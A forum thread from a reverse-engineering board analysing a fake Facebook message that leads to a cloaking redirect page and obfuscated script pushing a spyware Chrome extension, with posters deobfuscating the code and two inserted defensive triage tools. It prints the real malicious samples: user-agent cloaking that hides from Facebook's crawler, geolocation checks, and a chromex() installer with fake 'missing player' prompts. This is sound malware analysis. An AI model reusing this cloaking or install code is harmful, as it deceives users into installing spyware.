View Full Version : possible malicious redirect from fake FB message


evaluator
December 7th, 2014, 14:04
Just received this URL in FB messages:
http://goo.gl/DYkWzd
which goes to
https://dl.dropbox.com/s/dq4fio0g3wt5t35/saioduas09dsads_7.htm?1544593599

Code:
<script type="text/javascript"> // <![CDATA[
if ( (navigator.userAgent.indexOf('Android') != -1) ) {
document.location = "http://teladea.blogspot.com";
} // ]]>
</script>
<script language=javascript>
if((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i)))
{
location.replace("http://teladea.blogspot.com");
}
</script>
<body>

<script>


if (navigator['userAgent']['indexOf']('Firefox') != -1) {
window['location'] = 'http://video5826.s3-website.eu-central-1.amazonaws.com/mff35.html';
} else {
if (navigator['userAgent']['indexOf']('Facebook Bot') != -1) {
window['location'] = 'http://google.com';
} else {
if (navigator['userAgent']['indexOf']('Chrome') != -1) {
window['location'] = 'http://video5826.s3-website.eu-central-1.amazonaws.com/soda2/index.html';
} else {
window['location'] = 'http://teladea.blogspot.com';
};
};
};

//sadiuvsnavcsicusdasaasd
//dsafasd89fasd879fasd87d

</script>
</body>
//sadf654sda65fsa798dfsad4fsd5
//cvgbffdsssssa213dasdas456dasd879asd34as879
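
As an added example (not part of evaluator's post or anything else in this thread), here is the first thing a triage analyst wants before touching any of those URLs: a static pass over the landing page that lists every redirect sink together with the user-agent test guarding it, without executing the script. The token regexes and the route labels are my own assumptions about this cloaking style (indexOf/match on navigator.userAgent; document.location, window['location'] and location.replace as sinks); the sample page is a constructed copy of the one posted above, with the missing parenthesis restored. It needs no network.

```javascript
"use strict";

// Added example (not code from the thread): static triage of a cloaking landing page.
// One token regex covers UA tests (indexOf or match), bare `else`, and redirect sinks.
const TOKEN_RE = new RegExp([
  String.raw`navigator(?:\.userAgent|\[['"]userAgent['"]\])(?:\.indexOf|\[['"]indexOf['"]\])\(\s*(['"])(.*?)\1\s*\)`, // groups 1,2
  String.raw`navigator\.userAgent\.match\(\/(.*?)\/[a-z]*\)`,                                                       // group 3
  String.raw`\b(else)\b`,                                                                                           // group 4
  String.raw`(?:document\.location|window(?:\.location|\[['"]location['"]\])|location\.href|top\.location)\s*=\s*(['"])(.*?)\5`, // 5,6
  String.raw`location\.replace\(\s*(['"])(.*?)\7`,                                                                  // groups 7,8
].join("|"), "g");

// Walk the tokens in source order. Pending UA tests attach to the next redirect;
// a bare `else` clears them and marks the next redirect as the fallback branch.
function extractRedirects(html) {
  const routes = [];
  let pending = [];
  let afterElse = false;
  for (const m of html.matchAll(TOKEN_RE)) {
    if (m[2] !== undefined || m[3] !== undefined) {          // user-agent test
      pending.push(m[2] !== undefined ? m[2] : m[3]);
    } else if (m[4] !== undefined) {                         // else branch
      pending = [];
      afterElse = true;
    } else {                                                 // redirect sink
      const target = m[6] !== undefined ? m[6] : m[8];
      const condition = pending.length
        ? "UA contains " + pending.join(" or ")
        : afterElse ? "otherwise" : "unconditional";
      routes.push({ condition, target });
      pending = [];
      afterElse = false;
    }
  }
  return routes;
}

// Constructed sample: the landing page posted at the top of this thread.
const SAMPLE_PAGE = `
<script type="text/javascript"> // <![CDATA[
if ( (navigator.userAgent.indexOf('Android') != -1) ) {
document.location = "http://teladea.blogspot.com";
} // ]]>
</script>
<script language=javascript>
if((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i)))
{
location.replace("http://teladea.blogspot.com");
}
</script>
<body>
<script>
if (navigator['userAgent']['indexOf']('Firefox') != -1) {
window['location'] = 'http://video5826.s3-website.eu-central-1.amazonaws.com/mff35.html';
} else {
if (navigator['userAgent']['indexOf']('Facebook Bot') != -1) {
window['location'] = 'http://google.com';
} else {
if (navigator['userAgent']['indexOf']('Chrome') != -1) {
window['location'] = 'http://video5826.s3-website.eu-central-1.amazonaws.com/soda2/index.html';
} else {
window['location'] = 'http://teladea.blogspot.com';
};
};
};
</script>
</body>`;

for (const r of extractRedirects(SAMPLE_PAGE)) {
  console.log(`${r.condition.padEnd(30)} -> ${r.target}`);
}
```

Run it with `node triage.js` and you get six routes: Android, iPhone/iPod, Firefox, the "Facebook Bot" branch that sends the link-preview crawler to google.com so the preview looks clean, Chrome, and the fallback. The heuristic only understands this if/else-if shape; anything fancier (a lookup table keyed on UA, a redirect built by string concatenation) will show up as a wrong or missing route, so treat the output as a map for where to look, not as proof of what the page does.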

Kayaker
December 7th, 2014, 18:34
eval();

I was able to wget the index.html file (attached) that the Chrome link points to. The Firefox one gave a 403. The html file has 3 packed javascript entries that decode from an eval() statement. I unpacked the js using an online decoder (http://www.strictly-software.com/unpacker).

All I could really make sense of from the result was the "function chromex()", so I googled that and found that this seems to be about installing a spyware plugin on your Chrome (or Firefox) browser.

http://hacklog.in/warning-new-spyware-on-facebook/

btw, does anyone know a simple trick to parse out the values from what appear to be array elements used in the document[] and other statements, other than doing it manually?

K


Code:

var _0x8f38 = ["\x47\x45\x54", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x65\x6C\x69\x7A\x65\x2E\x63\x6F\x6D\x2F\x67\x65\x6F\x69\x70", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x70\x61\x72\x73\x65", "\x63\x6F\x75\x6E\x74\x72\x79\x5F\x63\x6F\x64\x65", "\x55\x53", "\x20\x20\x3C\x62\x6F\x64\x79\x3E\x20\x20", "\x77\x72\x69\x74\x65", "\x20\x3C\x62\x6F\x64\x79\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x63\x68\x72\x6F\x6D\x65\x78\x28\x29\x3B\x22\x3E"];
var xmlhttpz = new XMLHttpRequest();
xmlhttpz[_0x8f38[2]](_0x8f38[0], _0x8f38[1], false);
xmlhttpz[_0x8f38[3]]();
var get = JSON[_0x8f38[5]](xmlhttpz[_0x8f38[4]]);
var country = get[_0x8f38[6]];
if (country == _0x8f38[7]) {
document[_0x8f38[9]](_0x8f38[8])
} else {
document[_0x8f38[9]](_0x8f38[10])
};



Code:

var _0x805f = ["\x47\x45\x54", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x65\x6C\x69\x7A\x65\x2E\x63\x6F\x6D\x2F\x67\x65\x6F\x69\x70", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x70\x61\x72\x73\x65", "\x63\x6F\x75\x6E\x74\x72\x79\x5F\x63\x6F\x64\x65", "\x55\x53", "\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x22\x35\x30\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x33\x31\x35\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x79\x6F\x75\x74\x75\x62\x65\x2E\x63\x6F\x6D\x2F\x65\x6D\x62\x65\x64\x2F\x6F\x46\x4D\x73\x71\x72\x47\x39\x52\x57\x67\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C\x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E", "\x77\x72\x69\x74\x65", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x79\x6F\x75\x74\x75\x62\x65\x62\x6C\x6F\x63\x6B\x65\x72\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x35\x30\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x33\x30\x30\x70\x78\x3B\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x3A\x23\x30\x30\x30\x30\x30\x30\x3B\x22\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x69\x6D\x61\x67\x65\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x69\x6D\x61\x67\x65\x3A\x20\x75\x72\x6C\x28\x26\x23\x33\x39\x3B\x2E\x68\x74\x74\x70\x3A\x2F\x2F\x76\x6F\x64\x6F\x2E\x6D\x65\x2F\x74\x72\x61\x63\x6B\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x75\x70\x6C\x6F\x61\x64\x73\x2F\x32\x30\x31\x34\x2F\x30\x37\x2F\x66\x67\x66\x64\x67\x70\x6C\x2E\x6A\x70\x67\x26\x23\x33\x39\x3B\x29\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x70\x6C\x61\x79\x2D\x62\x75\x74\x74\x6F\x6E\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x63\x6F\x6E\x74\x72\x6F\x6C\x6C\x73\x22\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x6C\x65\x66\x74\x2D\x63\x6F\x6E\x74\x72\x6F\x6C\x6C\x73\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x72\x69\x67\x68\x74\x2D\x63\x6F\x6E\x74\x72\x6F\x6C\x6C\x73\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x6F\x76\x65\x72\x6C\x61\x79\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x73\x68\x61\x72\x65\x62\x6F\x78\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x2F\x64\x69\x76\x3E"];
var xmlhttpz = new XMLHttpRequest();
xmlhttpz[_0x805f[2]](_0x805f[0], _0x805f[1], false);
xmlhttpz[_0x805f[3]]();
var get = JSON[_0x805f[5]](xmlhttpz[_0x805f[4]]);
var country = get[_0x805f[6]];
if (country == _0x805f[7]) {
document[_0x805f[9]](_0x805f[8])
} else {
document[_0x805f[9]](_0x805f[10]);
document[_0x805f[9]](_0x805f[11]);
document[_0x805f[9]](_0x805f[12]);
document[_0x805f[9]](_0x805f[13]);
document[_0x805f[9]](_0x805f[14]);
document[_0x805f[9]](_0x805f[15]);
document[_0x805f[9]](_0x805f[16]);
document[_0x805f[9]](_0x805f[17]);
document[_0x805f[9]](_0x805f[18]);
document[_0x805f[9]](_0x805f[19])
};


Code:

var _0x3f6e = ["\x63\x6C\x69\x63\x6B", "\x2E\x79\x6F\x75\x74\x75\x62\x65\x62\x6C\x6F\x63\x6B\x65\x72", "\x72\x65\x61\x64\x79", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x68\x72\x6F\x6D\x65\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x77\x65\x62\x73\x74\x6F\x72\x65\x2F\x64\x65\x74\x61\x69\x6C\x2F", "", "\x73\x74\x79\x6C\x65", "\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x36\x65\x65\x35\x35\x32\x3B", "\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65", "\x62\x6F\x64\x79", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C", "\x54\x68\x61\x6E\x6B\x20\x79\x6F\x75\x20\x46\x6F\x72\x20\x59\x6F\x75\x72\x20\x53\x65\x74\x75\x70\x2C\x20\x53\x65\x74\x75\x70\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x57\x61\x69\x74\x20\x33\x20\x53\x65\x63\x6F\x6E\x64\x73\x2C\x20\x56\x69\x64\x65\x6F\x20\x53\x74\x61\x72\x74\x69\x6E\x67\x2E\x2E\x2E", "\x54\x68\x61\x6E\x6B\x20\x79\x6F\x75\x20\x46\x6F\x72\x20\x59\x6F\x75\x72\x20\x53\x65\x74\x75\x70\x2C\x20\x53\x65\x74\x75\x70\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x2E\x20\x0D\x0A\x20\x50\x6C\x65\x61\x73\x65\x20\x57\x61\x69\x74\x20\x33\x20\x53\x65\x63\x6F\x6E\x64\x73\x2C\x20\x56\x69\x64\x65\x6F\x20\x53\x74\x61\x72\x74\x69\x6E\x67\x2E", "\x68\x72\x65\x66", "\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x73\x68\x72\x54\x78\x42", "\x73\x72\x63", "\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x77\x69\x64\x67\x65\x74\x2F\x61\x64\x65\x61\x64\x69\x74\x69\x31\x2E\x70\x6E\x67", "\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x28\x22\x62\x6F\x64\x79\x22\x29\x5B\x30\x5D\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x22\x73\x74\x79\x6C\x65\x22\x2C\x22\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x66\x39\x66\x39\x66\x39\x3B\x22\x29\x3B", "\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x28\x22\x62\x6F\x64\x79\x22\x29\x5B\x30\x5D\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x22\x73\x74\x79\x6C\x65\x22\x2C\x22\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x36\x65\x65\x35\x35\x32\x3B\x22\x29\x3B", "\x77\x69\x6E\x64\x6F\x77\x2E\x63\x6C\x6F\x73\x65\x28\x29\x3B", "\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x72\x65\x64\x3B", "\x4D\x69\x73\x73\x69\x6E\x67\x20\x50\x6C\x61\x79\x65\x72\x21\x20\x50\x6C\x65\x61\x73\x65\x20\x61\x64\x64\x20", "\x20\x74\x6F\x20\x77\x61\x74\x63\x68\x20\x74\x68\x69\x73\x20\x76\x69\x64\x65\x6F", "\x20\x69\x6E\x20\x6F\x72\x64\x65\x72\x20\x74\x6F\x20\x77\x61\x74\x63\x68\x20\x74\x68\x69\x73\x20\x76\x69\x64\x65\x6F", "\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x28\x22\x62\x6F\x64\x79\x22\x29\x5B\x30\x5D\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x22\x73\x74\x79\x6C\x65\x22\x2C\x22\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x72\x65\x64\x3B\x22\x29\x3B", "\x69\x6E\x73\x74\x61\x6C\x6C", "\x77\x65\x62\x73\x74\x6F\x72\x65"];
$(document)[_0x3f6e[2]](function () {
$(_0x3f6e[1])[_0x3f6e[0]](function () {
chromex()
})
});
function chromex() {
chrome[_0x3f6e[26]][_0x3f6e[25]](_0x3f6e[3] + check + _0x3f6e[4], function () {
document[_0x3f6e[9]](_0x3f6e[8])[0][_0x3f6e[7]](_0x3f6e[5], _0x3f6e[6]);
titulo[_0x3f6e[10]] = _0x3f6e[11];
alert(_0x3f6e[12]);
location[_0x3f6e[13]] = _0x3f6e[14];
new Image()[_0x3f6e[15]] = _0x3f6e[16];
setTimeout(_0x3f6e[17], 500);
setTimeout(_0x3f6e[18], 1000);
setTimeout(_0x3f6e[17], 1500);
setTimeout(_0x3f6e[18], 2000);
setTimeout(_0x3f6e[17], 2500);
setTimeout(_0x3f6e[18], 3000);
setTimeout(_0x3f6e[19], 4000)
},
function (_0x95afx2) {
document[_0x3f6e[9]](_0x3f6e[8])[0][_0x3f6e[7]](_0x3f6e[5], _0x3f6e[20]);
titulo[_0x3f6e[10]] = _0x3f6e[21] + emri + _0x3f6e[22];
alert(_0x3f6e[21] + emri + _0x3f6e[23]);
setTimeout(_0x3f6e[17], 500);
setTimeout(_0x3f6e[24], 1000);
setTimeout(_0x3f6e[17], 1500);
setTimeout(_0x3f6e[24], 2000);
setTimeout(_0x3f6e[17], 2500)
})
};

peterg70
December 8th, 2014, 08:10
Hey Kayaker

Do you mean converting the escaped text in the array to normal text??
I use http://jsbeautifier.org/ to clean up this sort of code.
choose the option "Unescape printable chars encoded as \xNN or \uNNNN"
or
Use firebug in firefox to examine the code.
Code:

var _0x8f38 = ["GET", "http://www.telize.com/geoip", "open", "send", "responseText", "parse", "country_code", "US", " <body> ", "write", " <body onclick=\"chromex();\">"];

blabberer
December 8th, 2014, 14:34
Firefox mff35: 403
wget -c video5826.s3-website.eu-central-1.amazonaws.com/index.html is retrievable, attached below
It tries to get 1 png, 1 css and 4 js, also attached
Archive password is justincase

Code:

wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/mff35.html
Connecting to video5826.s3-website.eu-central-1.amazonaws.com|54.231.192.19|:80.
2014-12-09 00:01:43 ERROR 403: Forbidden.
wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/index.html
2014-12-09 00:01:58 (345 KB/s) - `index.html' saved [11012/11012]
wget -c http://whos.amung.us/widget/adeaditi.png
2014-12-09 00:27:40 (43.7 MB/s) - `289.png' saved [1612/1612]
wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/small.js
2014-12-09 00:29:29 (429 KB/s) - `small.js' saved [4801/4801]
wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/jquery.min.js
2014-12-09 00:30:05 (4.34 KB/s) - `jquery.min.js' saved [94843/94843]
wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/small.js
The file is already fully retrieved; nothing to do.
wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/style.css
2014-12-09 00:30:46 (53.3 KB/s) - `style.css' saved [3468/3468]
wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/tc.js
2014-12-09 00:31:02 (244 KB/s) - `tc.js' saved [8619/8619]


Kayaker
December 9th, 2014, 02:34
Hi peterg70

That's a good idea about using Firebug, it certainly makes things easier. I tend to forget about it.

Actually it was more about solving for the 'document' and other statements. Normally I'd use an alert box to resolve the output, but the syntax was throwing me.

For example a line similar to this one is used quite often.
document[_0x8f38[9]](_0x8f38[8])

The first item uses square brackets and in this example points to array element 9 = "write". I realize now that this decodes to document.write(). The second item is wrapped in round brackets and points to another array element, that being the document.write() variable itself, _0x8f38[8] = "<body>".

I was able to use the following to glean what it meant:
window.alert (_0x8f38[9] + _0x8f38[8]);


But yeah, it's a lot easier just using Firebug than trying to write syntactically correct and readable window.alert() messages all over the place.

This line for example
document[_0x3f6e[9]](_0x3f6e[8])[0][_0x3f6e[7]](_0x3f6e[5], _0x3f6e[6]);
By expanding the _0x3f6e array listing you can piece together the meaning on the fly:
document.getElementsByTagName("body")[0].setAttribute("style", "background-color: #6ee552;");

Thanks,
K
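
Kayaker's question about parsing out the array elements, answered with an added example that is not from any post in this thread: a small Node.js deobfuscator for exactly this string-array pattern. It decodes the \xNN and \uNNNN escapes in every `var _0x... = [...]` table, inlines each `_0x...[N]` reference as a string literal, drops the table, and rewrites `obj["prop"]` as `obj.prop`, so `document[_0x8f38[9]](_0x8f38[8])` comes out as `document.write("  <body>  ")`. The sample input is a constructed copy of the first packed block from the post above, with one of the forum's line-wrap spaces left inside a string to show that it gets stripped. Everything in the block (regexes, the wrap-space assumption, the helper names) is my own, not a library API.

```javascript
"use strict";

// Added example (not code from the thread): inline an obfuscator's string table.
// Handles `var _0xNNNN = ["\x..", ...];` plus `_0xNNNN[i]` and obj["prop"] lookups.

// Unescape the body of a JS string literal: \xNN, \uNNNN, \n and friends, \" \' \\.
function unescapeJsString(body) {
  const simple = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f", v: "\v", "0": "\0" };
  return body.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})|\\([\s\S])/g,
    (_, hex2, hex4, ch) => {
      if (hex2 !== undefined) return String.fromCharCode(parseInt(hex2, 16));
      if (hex4 !== undefined) return String.fromCharCode(parseInt(hex4, 16));
      return ch in simple ? simple[ch] : ch;
    });
}

const STR_LIT = String.raw`"(?:[^"\\]|\\[\s\S])*"|'(?:[^'\\]|\\[\s\S])*'`;
// `var NAME = [ "...", "..." ];` where every element is a string literal.
const ARRAY_DECL = new RegExp(
  String.raw`var\s+([A-Za-z_$][\w$]*)\s*=\s*\[\s*((?:${STR_LIT})(?:\s*,\s*(?:${STR_LIT}))*)\s*\]\s*;?`, "g");
const STR_LIT_RE = new RegExp(STR_LIT, "g");
const IDENT_RE = /^[A-Za-z_$][\w$]*$/;

// Map of table name -> decoded elements, for every all-string array declaration.
function collectStringArrays(src) {
  const tables = new Map();
  for (const m of src.matchAll(ARRAY_DECL)) {
    const elems = Array.from(m[2].matchAll(STR_LIT_RE), s => unescapeJsString(s[0].slice(1, -1)));
    tables.set(m[1], elems);
  }
  return tables;
}

function deobfuscate(src) {
  // Assumption: this obfuscator escapes every character, so a raw space between two
  // \x escapes can only come from forum/editor line wrapping; drop it before parsing.
  let out = src.replace(/(\\x[0-9A-Fa-f]{2}) +(?=\\x)/g, "$1");
  const tables = collectStringArrays(out);
  out = out.replace(ARRAY_DECL, "");                  // the table itself is no longer needed
  for (const [name, elems] of tables) {
    const ref = new RegExp(String.raw`\b${name.replace(/\$/g, "\\$")}\[(\d+)\]`, "g");
    out = out.replace(ref, (whole, idx) =>
      Number(idx) < elems.length ? JSON.stringify(elems[Number(idx)]) : whole);
  }
  // obj["prop"] / obj['prop'] -> obj.prop when prop is a plain identifier.
  out = out.replace(/\[("(?:[^"\\]|\\[\s\S])*"|'(?:[^'\\]|\\[\s\S])*')\]/g, (whole, lit) => {
    const prop = unescapeJsString(lit.slice(1, -1));
    return IDENT_RE.test(prop) ? "." + prop : whole;
  });
  return out.trim();
}

// Constructed sample: the first unpacked block from the post above, one wrap space kept.
const SAMPLE = String.raw`var _0x8f38 = ["\x47\x45\x54", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x65\x6C\x69\x7A\x65\x2E\x63\x6F\x6D\x2F\x67\x65\x6F \x69\x70", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x70\x61\x72\x73\x65", "\x63\x6F\x75\x6E\x74\x72\x79\x5F\x63\x6F\x64\x65", "\x55\x53", "\x20\x20\x3C\x62\x6F\x64\x79\x3E\x20\x20", "\x77\x72\x69\x74\x65", "\x20\x3C\x62\x6F\x64\x79\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x63\x68\x72\x6F\x6D\x65\x78\x28\x29\x3B\x22\x3E"];
var xmlhttpz = new XMLHttpRequest();
xmlhttpz[_0x8f38[2]](_0x8f38[0], _0x8f38[1], false);
xmlhttpz[_0x8f38[3]]();
var get = JSON[_0x8f38[5]](xmlhttpz[_0x8f38[4]]);
var country = get[_0x8f38[6]];
if (country == _0x8f38[7]) {
document[_0x8f38[9]](_0x8f38[8])
} else {
document[_0x8f38[9]](_0x8f38[10])
};`;

console.log(deobfuscate(SAMPLE));
```

Run it with `node unarray.js` and the sample prints as plain `xmlhttpz.open("GET", "http://www.telize.com/geoip", false)` / `document.write(...)` code. Only tables whose elements are all string literals are touched; a computed index, or the rotated arrays newer obfuscators emit, is left as-is rather than guessed at, which is the behaviour you want when the output feeds a report.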

peterg70
December 9th, 2014, 07:34
Kayaker

Sorry for the misunderstanding.

I found another one in my bookmarks which handles the arrays.
http://www.checkwebtool.com/tool/unminify-js
OR http://unminify.appspot.com/
This will convert the code above to
Code:

var xmlhttpz = new XMLHttpRequest();
xmlhttpz['open']('GET', 'http://www.telize.com/geoip', false);
xmlhttpz['send']();
var get = JSON['parse'](xmlhttpz['responseText']);
var country = get['country_code'];
if (country == 'US') {
document['write']('<iframe width="500" height="315" src="//www.youtube.com/embed/oFMsqrG9RWg" frameborder="0" allowfullscreen></iframe>')
} else {
document['write'](' <div class="youtubeblocker" style="width:500px;height:300px;background:#000000;">');
document['write'](' <div class="image" style="background-image: url('.http://vodo.me/track/wp-content/uploads/2014/07/fgfdgpl.jpg')"></div>');
document['write'](' <div class="play-button"></div>');
document['write'](' <div class="controlls">');
document['write'](' <div class="left-controlls"></div>');
document['write'](' <div class="right-controlls"></div>');
document['write'](' </div>');
document['write'](' <div class="overlay"></div>');
document['write'](' <div class="sharebox"></div>');
document['write'](' </div>')
};

evaluator
December 9th, 2014, 13:57
Yep, so this was a 17 August discovery from hacklog.in.
It is written there about Chromium browsers, and the new Opera is one of those. Is it also affected?

Kayaker
December 9th, 2014, 23:53
Quote:
Originally Posted by peterg70
I found another one in my bookmarks which handles the arrays.
http://www.checkwebtool.com/tool/unminify-js
OR http://unminify.appspot.com/


Oh that is absolutely perfect. Thanks!